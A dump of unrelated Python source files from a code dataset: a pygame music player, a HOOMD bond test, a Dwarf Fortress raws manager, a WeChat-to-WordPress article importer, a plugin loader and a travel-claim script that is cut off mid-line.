{"seq_id":"103460620","text":"import pygame\n\nclass MusicApp:\n\n    def __init__(self, *args):\n        self.playlist = []\n        self.songs = []\n        for song in args:\n            self.songs.append(song)\n        pygame.mixer.init(frequency=26050,size=-16,channels=2,buffer=4096)\n        self.offset = 0\n        self.play = False\n        self.playable = False\n        self.pos = 0\n        self.offset = 0\n        self.length = 1\n        self.songName = None\n\n    def playSong(self,song: str,pos:int):\n        pygame.mixer.music.stop()\n        # load the track first; mixer.music.play(loops, start) takes a position, not a filename\n        pygame.mixer.music.load(song)\n        pygame.mixer.music.play(0, pos)\n        # keep the paused state if the app is not currently playing\n        if not self.play:\n            pygame.mixer.music.pause()\n        self.songName = song\n        self.offset = pos*1000\n\n\n    def addPlaylist(self,song: str):\n        if song in self.songs:\n            self.playlist.append(song)\n            if self.playable == False:\n                self.playSong(song, 0)\n                self.playable = True\n            return True\n        return False\n\n    def removePlaylist(self,song: str):\n        if len(self.playlist) != 0:\n            if song in self.playlist:\n                pos = self.playlist.index(song)\n                self.playlist.remove(song)\n                if pos == self.pos:\n                    pygame.mixer.music.stop()\n                    self.offset = 0\n                    if self.playlist:\n                        # wrap the index in case the removed song was the last one\n                        self.pos = self.pos % len(self.playlist)\n                        pygame.mixer.music.load(self.playlist[self.pos])\n                        pygame.mixer.music.play()\n                        if not self.play:\n                            pygame.mixer.music.pause()\n                return True\n\n    def togglePlay(self):\n        if self.playable:\n            if self.play:\n                pygame.mixer.music.pause()\n                self.play = False\n            else:\n                pygame.mixer.music.unpause()\n                self.play = True\n\n\n    def skipAhead(self):\n        if self.playable:\n            if self.pos + 1 < len(self.playlist):\n                self.pos += 1\n                pygame.mixer.music.stop()\n                pygame.mixer.music.load(self.playlist[self.pos])\n                pygame.mixer.music.play()\n                if not self.play:\n                    pygame.mixer.music.pause()\n\n\n    def seek(self,pos: float):\n        if self.songName is not None:\n            self.playSong(self.songName, int(pos))\n            if not self.play:\n                pygame.mixer.music.pause()\n            self.offset = pos*1000\n\n\n","sub_path":"MusicApp.py","file_name":"MusicApp.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"305493634","text":"# -*- coding: iso-8859-1 -*-\n# Maintainer: joaander\n\nfrom hoomd import *\nfrom hoomd import md;\ncontext.initialize()\nimport unittest\nimport os\n\n# tests md.bond.harmonic\nclass bond_harmonic_tests (unittest.TestCase):\n    def setUp(self):\n        print\n        self.s = init.read_gsd(os.path.join(os.path.dirname(__file__),'test_data_polymer_system.gsd'));\n        context.current.sorter.set_params(grid=8)\n\n    # test to see that we can create a md.force.constant\n    def test_create(self):\n        md.bond.harmonic();\n\n    # test setting coefficients\n    def test_set_coeff(self):\n        harmonic = md.bond.harmonic();\n        harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n        all = group.all();\n        md.integrate.mode_standard(dt=0.005);\n        md.integrate.nve(all);\n        run(100);\n\n    # test coefficient not set checking\n    def test_set_coeff_fail(self):\n        harmonic = md.bond.harmonic();\n        all = group.all();\n        md.integrate.mode_standard(dt=0.005);\n        md.integrate.nve(all);\n        self.assertRaises(RuntimeError, run, 100);\n\n    # test remove particle fails\n    def
test_bond_fail(self):\n harmonic = md.bond.harmonic();\n harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n # remove a particle\n del(self.s.particles[0])\n if comm.get_num_ranks() == 1:\n self.assertRaises(RuntimeError, run, 100);\n else:\n # in MPI simulations, we cannot check for an assertion during a simulation\n # the program will terminate with MPI_Abort\n #self.assertRaises(RuntimeError, run, 100);\n pass\n\n # test adding a dimer\n def test_add_dimer(self):\n harmonic = md.bond.harmonic();\n harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n t0 = self.s.particles.add('A')\n t1 = self.s.particles.add('B')\n self.s.bonds.add('polymer',t0,t1)\n run(100)\n\n # test exclusions in neighbor list\n def test_exclusions(self):\n harmonic = md.bond.harmonic();\n harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n nl = md.nlist.cell()\n lj = md.pair.lj(r_cut=3.0, nlist = nl)\n lj.pair_coeff.set('A', 'A', epsilon=1.0, sigma=1.0);\n lj.pair_coeff.set('A', 'B', epsilon=1.0, sigma=1.0);\n lj.pair_coeff.set('B', 'B', epsilon=1.0, sigma=1.0);\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n run(100)\n\n self.assertEqual(nl.cpp_nlist.getNumExclusions(2), (17*100+2*10))\n self.assertEqual(nl.cpp_nlist.getNumExclusions(1), (2*100+2*10))\n\n # delete bonds connected to a particle\n tags = []\n for b in self.s.bonds:\n if b.a == 2 or b.b == 2:\n tags.append(b.tag)\n\n for t in tags:\n self.s.bonds.remove(t)\n\n # delete particle\n self.s.particles.remove(2)\n\n run(100)\n\n self.assertEqual(nl.cpp_nlist.getNumExclusions(2), (17*100+2*10)-3)\n self.assertEqual(nl.cpp_nlist.getNumExclusions(1), (2*100+2*10)+2)\n del nl\n del lj\n del harmonic\n\n def tearDown(self):\n del self.s\n context.initialize();\n\nif __name__ == '__main__':\n unittest.main(argv = ['test.py', '-v'])\n","sub_path":"hoomd/md/test-py/test_bond_harmonic.py","file_name":"test_bond_harmonic.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"128424713","text":"import re\nimport pydwarf\nfrom raws import *\nfrom settings import exportsettings as settings\nfrom utils import copytree\n\n# Actually run the program\ndef __main__():\n \n pydwarf.log.info('Running PyDwarf %s.' % pydwarf.__version__)\n if settings.dfversion is not None:\n pydwarf.log.info('Managing Dwarf Fortress version %s.' % settings.dfversion)\n else:\n pydwarf.log.error('No Dwarf Fortress version was specified in settings. Scripts will be run regardless of their indicated compatibility.')\n \n if os.path.exists(settings.rawsdir):\n \n if settings.backup and settings.backupdir:\n pydwarf.log.info('Backing up raws to %s...' % settings.backupdir)\n copytree(settings.rawsdir, settings.backupdir)\n else:\n pydwarf.log.warning('Proceeding without backing up raws.')\n \n pydwarf.log.info('Reading raws from %s...' % settings.rawsdir)\n r = raws().read(settings.rawsdir, pydwarf.log)\n \n pydwarf.log.info('Running scripts...')\n for script in settings.runscripts:\n pydwarf.log.debug('Handling script %s...' 
% script)\n \n urist = None\n scriptname = None\n scriptfunc = None\n scriptargs = None\n if isinstance(script, tuple) or isinstance(script, list):\n scriptargs = script[1]\n script = script[0]\n elif isinstance(script, dict):\n scriptname = script.get('name')\n scriptargs = script.get('args')\n scriptmatch = script.get('match')\n scriptignoreversion = script.get('ignore_df_version')\n checkversion = None if scriptignoreversion else settings.dfversion\n candidates = pydwarf.urist.get(scriptname, version=checkversion, match=scriptmatch)\n if candidates and len(candidates):\n urist = candidates[0]\n scriptname = urist.name\n if len(candidates) > 1: pydwarf.log.warning('More than one fitting script has been specified, using a best guess.') \n elif callable(script):\n scriptname = script.__name__\n scriptfunc = script\n else:\n scriptname = script\n candidates = pydwarf.urist.get(scriptname, version=settings.dfversion)\n if candidates and len(candidates):\n urist = candidates[0]\n scriptname = urist.name\n if len(candidates) > 1: pydwarf.log.warning('More than one fitting script has been specified, using a best guess.')\n if urist and scriptfunc is None:\n scriptfunc = urist.fn\n \n if scriptfunc:\n scriptinfo = 'Running script %s' % scriptname\n if scriptargs: scriptinfo = '%s with args %s' % (scriptinfo, scriptargs)\n pydwarf.log.info('%s...' % scriptinfo)\n \n try:\n response = scriptfunc(r, **scriptargs) if scriptargs else scriptfunc(r)\n if response:\n success = response.get('success')\n status = response['status'] if 'status' in response else ('Script %s ran %ssuccessfully.' % (scriptname, '' if success else 'un'))\n pydwarf.log.info('%s: %s' % ('SUCCESS' if success else 'FAILURE', status))\n else:\n pydwarf.log.error('Received no response from script %s.' % scriptname)\n except Exception:\n pydwarf.log.exception('Unhandled exception while running script %s.' % scriptname)\n else:\n pydwarf.log.info('Finished running script %s.' % scriptname)\n\n else:\n pydwarf.log.error('Failed to retrieve script %s.' % scriptname)\n \n outputdir = settings.outputdir if settings.outputdir else settings.rawsdir\n pydwarf.log.info('Writing changes to raws to %s...' 
% outputdir)\n        if not os.path.exists(outputdir): os.makedirs(outputdir)\n        r.write(outputdir, pydwarf.log)\n        \n        pydwarf.log.info('All done!')\n    \n    else:\n        pydwarf.log.info('Specified raws directory does not exist.')\n\nif __name__ == \"__main__\":\n    __main__()\n","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"306649830","text":"# -*- coding: utf-8 -*-\r\n\r\nimport json\r\nimport urllib.request as urllib2\r\nfrom bs4 import BeautifulSoup\r\nimport mysql\r\nimport datetime\r\nimport numpy as np\r\n\r\nresult_json_file = 'result_170816.json'\r\nwith open(result_json_file, 'r') as f:\r\n    data = json.load(f)\r\n\r\nconnection = mysql.mysql_ctrl()\r\n# Use the cursor() method to create a cursor object\r\ncursor = connection.cursor()\r\n\r\n# List the existing users\r\ncursor.execute('select id,user_login from wp_users')\r\nauthors = list(cursor.fetchall())\r\n\r\n# Get the largest post_author_id\r\ncursor.execute('select max(id) from wp_users')\r\nmax_user_id = cursor.fetchall()[0][0]\r\n\r\n# Get the largest post_id\r\ncursor.execute('select max(id) from wp_posts')\r\nmax_post_id = cursor.fetchall()[0][0]\r\nif max_post_id is None:\r\n    max_post_id = 0\r\n\r\n# List the WeChat URLs of the existing posts\r\ncursor.execute('select guid from wp_posts where guid like \"http://mp.weixin.qq.com/%\"')\r\npost_url = list(cursor.fetchall())\r\n\r\n# Initialize some variables\r\npost_author_id = 0\r\npost_id = max_post_id\r\n\r\n#for i in range(0, 1):\r\nfor i in range(0, len(data)):\r\n    # Read the JSON record\r\n    url = data[i]['url']\r\n    cover_image_url = data[i]['cover_image_url']\r\n    digest = data[i]['digest']\r\n    source_url = data[i]['source_url']\r\n    title = data[i]['title']\r\n    category = data[i]['category']\r\n\r\n    # Check whether the post already exists\r\n    if np.in1d(url, post_url):\r\n        print(str(i) + ': post already exists, skipping')\r\n        continue\r\n\r\n    # Crawl the content\r\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) '\\\r\n                             'Gecko/20091201 Firefox/3.5.6'}\r\n    try:\r\n        req = urllib2.Request(url, headers=headers)\r\n    except:\r\n        print('----------Failed to read the URL, skipping to the next record----------')\r\n        continue\r\n    content = urllib2.urlopen(req).read()\r\n    soup = BeautifulSoup(content, 'html.parser')\r\n\r\n    try:\r\n        post_date = soup.find('em', {'id': 'post-date'}).string.strip()\r\n    except:\r\n        print('----------Element not found, the post may have been blocked----------')\r\n        continue\r\n\r\n    description = \"No details available\"\r\n    try:\r\n        description = soup.find('div', {'id': 'js_profile_qrcode'})\\\r\n            .find('div', {'class': 'profile_inner'})\\\r\n            .findAll('p', {'class':'profile_meta'})[1]\\\r\n            .find('span', {'class':'profile_meta_value'}).string.strip()\r\n    except:\r\n        print('----------Official account description not found----------')\r\n\r\n    all_date = datetime.datetime.strptime(post_date, \"%Y-%m-%d\")\r\n    post_author_name = soup.find('a',{'id': 'post-user'}).string.strip() # official account name\r\n    try:\r\n        wechat_id = soup.find('div',{'id': 'js_profile_qrcode'})\\\r\n            .find('div',{'class': 'profile_inner'})\\\r\n            .findAll('p',{'class':'profile_meta'})[0]\\\r\n            .find('span',{'class':'profile_meta_value'}).string.strip()\r\n        user_nicename = wechat_id\r\n    except:\r\n        wechat_id = post_author_name\r\n        user_nicename = ''\r\n\r\n    # Check whether the official account already exists in wp_users\r\n    new_author = 'yes'\r\n    for a in authors:\r\n        # If it exists, reuse its id\r\n        if a[1] == wechat_id:\r\n            post_author_id = a[0]\r\n            new_author = 'no'\r\n\r\n    # If it does not exist, take the largest id plus one and insert it into the wp_users table\r\n    if new_author == 'yes':\r\n        add_author_sql = '''INSERT INTO wp_users \r\n            (id,user_login,user_pass,user_nicename,user_registered,display_name)\r\n            VALUES (%s,%s,%s,%s,%s,%s)'''\r\n        post_author_id = max_user_id + 1\r\n        max_user_id = post_author_id\r\n        if user_nicename == '':\r\n            user_nicename = str(post_author_id)\r\n        user_registered = datetime.datetime.now().strftime('%Y-%m-%d')\r\n        add_author_value = [post_author_id,wechat_id,'$P$BNVjZktJh7.E2nhYoEjn4RS4.rfdML/',user_nicename,user_registered,post_author_name]\r\n        # Execute the SQL statement\r\n        cursor.execute(add_author_sql,add_author_value)\r\n        # Commit to the database\r\n        connection.commit()\r\n        # Add the new user to the in-memory list\r\n        authors.append((post_author_id,wechat_id))\r\n\r\n        # Insert the account description\r\n        add_description_sql = 'INSERT INTO wp_usermeta (user_id,meta_key,meta_value) VALUES (%s,%s,%s)'\r\n        add_description_value = [post_author_id,'description',description]\r\n        cursor.execute(add_description_sql,add_description_value)\r\n        connection.commit()\r\n\r\n        print(\"----------New author: \" + wechat_id + ':' + description + '----------')\r\n\r\n\r\n    # Process the article body\r\n    post_content = ''\r\n    for child in soup.find('div',{'id': 'js_content'}).children:\r\n        post_content = post_content + str(child)\r\n    soup_post_content = BeautifulSoup(post_content, 'html.parser')\r\n    for image in soup_post_content.findAll('img',{'data-src':True}):\r\n        data_src = image['data-src']\r\n        image['src'] = data_src\r\n    post_content = str(soup_post_content)\r\n    url_prefix = 'http://read.html5.qq.com/image?src=forum&q=5&r=0&imgflag=7&imageUrl='\r\n    # str.replace returns a new string, so the result must be assigned back\r\n    post_content = post_content.replace('http://mmbiz.qpic.cn/', url_prefix + 'http://mmbiz.qpic.cn/')\r\n    \r\n    # Write the post to the database\r\n    post_id = post_id + 1\r\n    post_author = post_author_id\r\n    post_date = all_date\r\n    post_date_gmt = all_date\r\n    post_title = soup.find('h2', {'id': 'activity-name'}).string.strip()\r\n    post_excerpt = digest\r\n    post_status = 'publish'\r\n    comment_status = 'open'\r\n    ping_status = 'open'\r\n    post_password = ''\r\n    post_name = ''\r\n    to_ping = ''\r\n    pinged = ''\r\n    post_modified = all_date\r\n    post_modified_gmt = all_date\r\n    post_content_filtered = ''\r\n    post_parent = 0\r\n    guid = url\r\n    menu_order = 0\r\n    post_type = 'post'\r\n    post_mime_type = ''\r\n    comment_count = 0\r\n\r\n    add_wp_posts = '''INSERT INTO wp_posts(\r\n        id,\r\n        post_author,\r\n        post_date,\r\n        post_date_gmt,\r\n        post_content,\r\n        post_title,\r\n        post_excerpt,\r\n        post_status,\r\n        comment_status,\r\n        ping_status,\r\n        post_password,\r\n        post_name,\r\n        to_ping,\r\n        pinged,\r\n        post_modified,\r\n        post_modified_gmt,\r\n        post_content_filtered,\r\n        post_parent,\r\n        guid,\r\n        menu_order,\r\n        post_type,\r\n        post_mime_type,\r\n        comment_count\r\n        )\r\n        VALUES \r\n        (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'''\r\n\r\n    add_value = [\r\n        post_id,\r\n        post_author,\r\n        post_date,\r\n        post_date_gmt,\r\n        post_content,\r\n        post_title,\r\n        post_excerpt,\r\n        post_status,\r\n        comment_status,\r\n        ping_status,\r\n        post_password,\r\n        post_name,\r\n        to_ping,\r\n        pinged,\r\n        post_modified,\r\n        post_modified_gmt,\r\n        post_content_filtered,\r\n        post_parent,\r\n        guid,\r\n        menu_order,\r\n        post_type,\r\n        post_mime_type,\r\n        comment_count\r\n    ]\r\n    cursor.execute(add_wp_posts,add_value)\r\n    connection.commit()\r\n\r\n    # Add the category\r\n    add_wp_term = 'INSERT INTO wp_term_relationships(object_id, term_taxonomy_id, term_order) VALUES (%s,%s,%s)'\r\n    wp_term_value = [post_id,category,0]\r\n    cursor.execute(add_wp_term,wp_term_value)\r\n    update_category_count = 'UPDATE wp_term_taxonomy SET count=count+1 WHERE term_taxonomy_id = %s'\r\n    cursor.execute(update_category_count,category)\r\n    connection.commit()\r\n\r\n    # Insert the cover image; its guid links to cover_image_url\r\n    post_id = post_id + 1\r\n    post_author = post_author_id\r\n    post_date = all_date\r\n    post_date_gmt = all_date\r\n    post_content = ''\r\n    post_title = '1'\r\n    post_excerpt = ''\r\n    post_status = 'inherit'\r\n    comment_status = 'open'\r\n    ping_status = 'closed'\r\n    post_password = ''\r\n    post_name = '1'\r\n    to_ping = ''\r\n    pinged = ''\r\n    post_modified = all_date\r\n    post_modified_gmt = all_date\r\n    post_content_filtered = ''\r\n    post_parent = 0\r\n    guid = url_prefix + cover_image_url\r\n    menu_order = 0\r\n    post_type = 'attachment'\r\n    post_mime_type = 'image/jpeg'\r\n    comment_count = 0\r\n\r\n    cover_image_value = [\r\n        post_id,\r\n        post_author,\r\n        post_date,\r\n        post_date_gmt,\r\n        post_content,\r\n        post_title,\r\n        post_excerpt,\r\n        post_status,\r\n        comment_status,\r\n        ping_status,\r\n        post_password,\r\n        post_name,\r\n        to_ping,\r\n        pinged,\r\n        post_modified,\r\n        post_modified_gmt,\r\n        post_content_filtered,\r\n        post_parent,\r\n        guid,\r\n        menu_order,\r\n        post_type,\r\n        post_mime_type,\r\n        comment_count\r\n    ]\r\n    cursor.execute(add_wp_posts,cover_image_value)\r\n    connection.commit()\r\n\r\n    # Link the image and the post in wp_postmeta\r\n    add_wp_postmeta = 'insert into wp_postmeta (post_id,meta_key,meta_value) values (%s,%s,%s)'\r\n    postmeta_value = [post_id,'_wp_attached_file',url_prefix + cover_image_url]\r\n    cursor.execute(add_wp_postmeta,postmeta_value)\r\n\r\n    add_wp_postmeta = 'insert into wp_postmeta (post_id,meta_key,meta_value) values (%s,%s,%s)'\r\n    postmeta_value = [post_id-1,'_thumbnail_id',post_id]\r\n    cursor.execute(add_wp_postmeta,postmeta_value)\r\n\r\n    connection.commit()\r\n\r\n    print('Wrote article ' + str(i))\r\n\r\n# Close the database connection\r\nconnection.close()","sub_path":"data/json/wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"521815699","text":"\nimport sys\nimport os\nimport logging\nimport importlib\nfrom fnmatch import fnmatch\nimport pulse.vendor.yaml as yaml\n\nfrom .
import core\n\n\n__all__ = [\n 'BuildActionLoader',\n]\n\nLOG = logging.getLogger(__name__)\n\n\ndef _isSamePythonFile(fileA, fileB):\n return (os.path.normpath(os.path.splitext(fileA)[0]) ==\n os.path.normpath(os.path.splitext(fileB)[0]))\n\n\nclass BuildActionLoader(object):\n\n def loadActionConfig(self, name, configFile):\n \"\"\"\n Load and return the config data for a BuildAction class.\n\n Args:\n name (str): The name of the BuildAction for which to load a config\n configFile (str): The path to the BuildAction config file\n\n Returns:\n A dict representing the config data for the named BuildAction\n \"\"\"\n if not os.path.isfile(configFile):\n LOG.warning(\"Config file not found: {0}\".format(configFile))\n return False\n\n with open(configFile, 'rb') as fp:\n config = yaml.load(fp.read())\n\n if config and (name in config):\n actionConfig = config[name]\n actionConfig['configFile'] = configFile\n return actionConfig\n\n LOG.warning(\"No BuildAction config data for {0} \"\n \"was found in {1}\".format(name, configFile))\n\n def loadActionsFromModule(self, module):\n \"\"\"\n Return BuildStep type map data for all BuildActions\n contained in the given module\n\n Returns:\n A list of tuples containing (dict, class) representing the\n action's config and BuildAction class.\n\n \"\"\"\n result = []\n for name in dir(module):\n obj = getattr(module, name)\n if (isinstance(obj, type) and issubclass(obj, core.BuildAction) and\n obj is not core.BuildAction):\n # get config for the action class\n actionName = obj.__name__\n configFile = os.path.splitext(module.__file__)[0] + '.yaml'\n actionConfig = self.loadActionConfig(name, configFile)\n if actionConfig:\n LOG.debug('Loaded BuildAction: {0}'.format(obj.__name__))\n result.append((actionConfig, obj))\n else:\n LOG.error('Failed to load BuildAction: {0}'.format(\n obj.getTypeName()))\n return result\n\n def loadActionsFromDirectory(self, startDir, pattern='*_pulseaction.py'):\n \"\"\"\n Return BuildStep type map data for all BuildActions found\n by searching a directory. 
Search is performed recursively for\n any python files matching a pattern.\n\n Args:\n startDir: A str path of the directory to search\n\n Returns:\n A list of tuples containing (dict, class) representing the\n action's config and BuildAction class.\n \"\"\"\n if '~' in startDir:\n startDir = os.path.expanduser(startDir)\n\n result = []\n\n paths = os.listdir(startDir)\n for path in paths:\n fullPath = os.path.join(startDir, path)\n\n if os.path.isfile(fullPath):\n if fnmatch(path, pattern):\n module = self._getModuleFromFile(fullPath)\n result.extend(self.loadActionsFromModule(module))\n\n elif os.path.isdir(fullPath):\n result.extend(self.loadActionsFromDirectory(fullPath, pattern))\n\n return result\n\n def _getModuleFromFile(self, filePath):\n # get module name\n name = os.path.splitext(os.path.basename(filePath))[0]\n # check for existing module in sys.modules\n if name in sys.modules:\n if _isSamePythonFile(sys.modules[name].__file__, filePath):\n # correct module already imported, delete it to force reload\n del sys.modules[name]\n else:\n raise ImportError(\"BuildAction module does not have \"\n \"a unique module name: \" + filePath)\n # add dir to sys path if necessary\n dirName = os.path.dirname(filePath)\n isNotInSysPath = False\n if not dirName in sys.path:\n sys.path.insert(0, dirName)\n isNotInSysPath = True\n module = importlib.import_module(name)\n # remove path from sys\n if isNotInSysPath:\n sys.path.remove(dirName)\n return module\n","sub_path":"src/pulse/scripts/pulse/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"434204387","text":"# Sprint Week 2!\n\n# Author: Evan Murphy & Stephen Menecola\n\n# Date: 03/12/21\n\nimport Backpack as BP\nfrom datetime import datetime\nCurDate = datetime.now()\n\nClaimNumber = 0\nHST = 0.15\nLowPerDiemRate = 85.00\nHighPerDiemRate = 100\nMileageRate = 0.10\nRentalCarRate = 56\n\n# Reads and initialises from Deflt.dat file\n\nfile = open('Deflt.dat', 'r')\nClaimNumber = int(file.readline())\nHST = float(file.readline())\nLowPerDiemRate = int(file.readline())\nHighPerDiemRate = int(file.readline())\nMileageRate = float(file.readline())\nRentalCarRate = int(file.readline())\nfile.close()\n\n\n# This function will process salesperson travel claims\ndef TravelClaim(ClaimNumber):\n while True:\n EmployeeNumber = BP.ValidEmployeeNumber9()\n EmployeeName = input(\"Enter employee name: \")\n TripLocation = input(\"Enter location of travel: \")\n\n # Format the dates to allow them to be subtracted****\n\n # newdate1 = time.strptime(date1, \"%d/%m/%Y\") and newdate2 = time.strptime(date2, \"%d/%m/%Y\")\n StartDatestr = input(\"Business trip start date (yyyy-mm-dd): \")\n EndDatestr = input(\"Business trip end date (yyyy-mm-dd): \")\n # formats start & end dates without time, and calculates travel days\n StartDate, EndDate, TotalTravelDays = BP.ProcessDate(StartDatestr, EndDatestr)\n\n OwnOrRented = input(\"Was the vehicle owned or rented? 
(O/R): \")\n TotalKilometers = int(input(\"Enter the total kilometers travelled: \"))\n\n if TotalTravelDays <= 3:\n PerDiem = TotalTravelDays * 85.00\n else:\n PerDiem = TotalTravelDays * 100.00\n\n if OwnOrRented.upper() == \"O\":\n MileageAmount = TotalKilometers * 0.10\n elif OwnOrRented.upper() == \"R\":\n MileageAmount = TotalTravelDays * 56.00\n else:\n MileageAmount = 0\n\n ClaimAmount = PerDiem + MileageAmount\n TaxAmount = PerDiem * HST\n ClaimTotal = ClaimAmount + TaxAmount\n\n # Formatting\n\n #PerDiemStr = \"${:,.2f}\".format(PerDiem)\n #MileageAmountStr = \"${:,.2f}\".format(MileageAmount)\n #ClaimAmountStr = \"${:,.2f}\".format(ClaimAmount)\n TaxAmountStr = \"${:,.2f}\".format(TaxAmount)\n ClaimTotalStr = \"${:,.2f}\".format(ClaimTotal)\n\n\n # Printing results\n\n print()\n print(\" NL Chocolate Company - Travel Claim\")\n print()\n print(\"*\" * 60)\n print()\n print(\"Employee Number: {} Employee Name: {:<12}\".format(EmployeeNumber, EmployeeName))\n print()\n print(\"Travel location: {}\".format(TripLocation))\n print(\"Travel Start Date: {} Travel End Date: {}\".format(StartDate, EndDate))\n print()\n print(\"Total Days Travelled: {}\".format(TotalTravelDays))\n print(\"Car Status (Owned or Rented): {}\".format(OwnOrRented))\n print(\"Total Kilometers Travelled: {}\".format(TotalKilometers))\n print()\n print(\"*\" * 60)\n print()\n print(\"Daily Cost: ${:,.2f}\".format(PerDiem))\n print(\"Mileage Cost: ${:,.2f}\".format(MileageAmount))\n print(\"Claim Amount: ${:,.2f}\".format(ClaimAmount))\n print(\"Tax Amount: {:<10}\".format(TaxAmountStr))\n print(\" ----------\")\n print(\"Claim Total: {:<10}\".format(ClaimTotalStr))\n print()\n print(\"\")\n\n file = open('Claims.dat', 'a')\n\n file.write(\"{}, \".format(ClaimNumber))\n file.write(\"{}, \".format(EmployeeNumber))\n file.write(\"{}, \".format(EmployeeName))\n file.write(\"{}, \".format(TripLocation))\n file.write(\"{}, \".format(StartDate))\n file.write(\"{}, \".format(EndDate))\n file.write(\"{}, \".format(TotalTravelDays))\n file.write(\"{}, \".format(OwnOrRented))\n file.write(\"{}, \".format(TotalKilometers))\n file.write(\"{}, \".format(PerDiem))\n file.write(\"{}, \".format(MileageAmount))\n file.write(\"{}, \".format(ClaimAmount))\n file.write(\"{}, \".format(TaxAmount))\n file.write(\"{}\\n\".format(ClaimTotal))\n\n file.close()\n\n # Increase claim number\n ClaimNumber += 1\n\n # Updates Deflt.dat with new claim number\n file = open('Deflt.dat', 'w')\n file.write(\"{}\\n\".format(str(ClaimNumber)))\n file.write(\"{}\\n\".format(str(HST)))\n file.write(\"{}\\n\".format(str(LowPerDiemRate)))\n file.write(\"{}\\n\".format(str(HighPerDiemRate)))\n file.write(\"{}\\n\".format(float(MileageRate)))\n file.write(\"{}\\n\".format(int(RentalCarRate)))\n file.close()\n\n print(\"Claim processed successfully\")\n print()\n\n Continue = input(\"Process another data claim? 
(Enter Y for yes or any other key to end): \")\n if Continue.upper() != \"Y\":\n break\n\n Anykey = input(\"Press any key to continue.\")\n\n\n# This function will allow the user to edit the system default values\ndef EditDefaultValues():\n\n # Open the defaults file and read the values into variables\n f = open('Deflt.dat', 'r')\n ClaimNumber = int(f.readline())\n HSTRate = float(f.readline())\n LowPerDiemRate = int(f.readline())\n HighPerDiemRate = int(f.readline())\n MileageRate = float(f.readline())\n RentalCarRate = int(f.readline())\n f.close()\n\n print(\"NL Chocolate Company\")\n print(\"Edit Default Values\")\n print()\n print(\"For each value, enter an updated value, \")\n print(\"or press Enter to keep the existing value.\")\n print(\"Current value is shown in ().\")\n print()\n\n NewClaimNumber = input(\"Enter the claim number (\" + str(ClaimNumber) + \"): \")\n if NewClaimNumber == \"\":\n NewClaimNumber = ClaimNumber\n\n NewHSTRate = input(\"Enter the HSTRate (\" + str(HSTRate) + \"): \")\n if NewHSTRate == \"\":\n NewHSTRate = HSTRate\n\n NewLowPerDiemRate = input(\"Enter the low per diem rate (\" + str(LowPerDiemRate) + \"): \")\n if NewLowPerDiemRate == \"\":\n NewLowPerDiemRate = LowPerDiemRate\n\n NewHighPerDiemRate = input(\"Enter the high per diem rate (\" + str(HighPerDiemRate) + \"): \")\n if NewHighPerDiemRate == \"\":\n NewHighPerDiemRate = HighPerDiemRate\n\n NewMileageRate = input(\"Enter the new mileage rate (\" + str(MileageRate) + \"): \")\n if NewMileageRate == \"\":\n NewMileageRate = MileageRate\n\n NewRentalCarRate = input(\"Enter the rental care rate (\" + str(RentalCarRate) + \"): \")\n if NewRentalCarRate == \"\":\n NewRentalCarRate = RentalCarRate\n\n f = open('Deflt.dat', 'w')\n f.write(\"{}\\n\".format(str(NewClaimNumber)))\n f.write(\"{}\\n\".format(str(NewHSTRate)))\n f.write(\"{}\\n\".format(str(NewLowPerDiemRate)))\n f.write(\"{}\\n\".format(str(NewHighPerDiemRate)))\n f.write(\"{}\\n\".format(str(NewMileageRate)))\n f.write(\"{}\\n\".format(str(NewRentalCarRate)))\n f.close()\n\n print()\n print(\"Default values successfully updated\")\n\n Anykey = input(\"Press any key to continue.\")\n\n\n# This function will allow the user to print a travel report\ndef PrintTravelReport():\n while True:\n\n print()\n print(\" 1 2 3 4 5 6 7 8\")\n print(\"1234567890\" * 8)\n print()\n print(\" NL Chocolate Company\")\n print()\n print(\" Travel Claims Listing as of {}\".format(CurDate.strftime(\"%m/%d/%Y\")))\n print()\n print(\"Claim Claim Salesperson Claim Per Diem Mileage Claim\")\n print(\"Number Date Name Location Amount Amount Amount\")\n print(\"=\" * 86)\n\n file = open('Claims.dat', 'r')\n\n ClaimCounter = 0\n PerDiemAccumulator = 0\n MileageAccumulator = 0\n ClaimAmountAccumulator = 0\n\n for claims in file:\n ClaimList = claims.split(\",\")\n ClaimNumber = ClaimList[0]\n ClaimDate = ClaimList[4].strip()\n Salesperson = ClaimList[2].strip()\n ClaimLocation = ClaimList[3].strip()\n PerDiemAmount = float(ClaimList[9].strip())\n MileageAmount = float(ClaimList[10].strip())\n ClaimAmount = float(ClaimList[11].strip())\n\n print(\"{:<3} {:<10} {:<12} {:<12} ${:,.2f} ${:,.2f} ${:,.2f}\".format(ClaimNumber, ClaimDate, Salesperson, ClaimLocation, PerDiemAmount, MileageAmount, ClaimAmount))\n\n ClaimCounter += 1\n PerDiemAccumulator += PerDiemAmount\n MileageAccumulator += MileageAmount\n ClaimAmountAccumulator += ClaimAmount\n\n\n print(\"=\"*86)\n print(\"{} claims listed ${:,.2f} ${:,.2f} ${:,.2f}\".format(ClaimCounter, PerDiemAccumulator, 
